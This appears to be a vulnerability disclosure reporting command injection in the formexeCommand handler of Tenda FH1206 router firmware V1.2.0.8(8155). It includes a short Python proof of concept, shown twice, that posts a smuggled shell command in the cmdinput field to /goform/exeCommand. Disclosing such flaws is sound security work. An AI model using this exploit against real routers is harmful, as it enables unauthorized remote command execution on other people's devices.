[ Discoverer: ta0lve ]
Tenda FH1206 V1.2.0.8(8155)
V1.2.0.8(8155)
The Tenda FH1206 V1.2.0.8(8155) has a command injection vulnerablility located in the formexeCommand
function. The src
variable receives the cmdinput
parameter from a POST request and is later assigned to the v7
variable, which is directly used in the doSystemCmd
function, causing an arbitrary command execution. The user-provided cmdinput
can trigger this security vulnerability
# formexeCommand_RCE
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/exeCommand"
data = {'cmdinput':'echo \\'hack!!!\\';ls;'}
ret = requests.post(url, data)
###Vulnerability type
CWE-94
Improper Control of Generation of Code ('Code Injection')
Remote Code Execution (RCE)
###Vendor of the product(s)
Tenda FH1206 V1.2.0.8(8155)
###Product_version
Tenda FH1206
V1.2.0.8(8155)
###Attack type
Remote
###Affected_component
the "formexeCommand " function of /bin/httpd; /bin/httpd
###Attack_vector
use a simple exp to attack, like this:
#python3
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/exeCommand"
data = {'cmdinput':'echo \\'hack!!!\\';ls;'}
ret = requests.post(url, data)
###Discription
Tenda FH1206 V1.2.0.8(8155) was discovered to contain a command injection vulnerability via the cmdinput parameter at ip/goform/formexeCommand.
###Refernce
<https://palm-vertebra-fe9.notion.site/formexeCommand_RCE-91a5f12ae23a42b4a25f5d1d4de308da>
<https://www.tendacn.com/hk/download/detail-2344.html>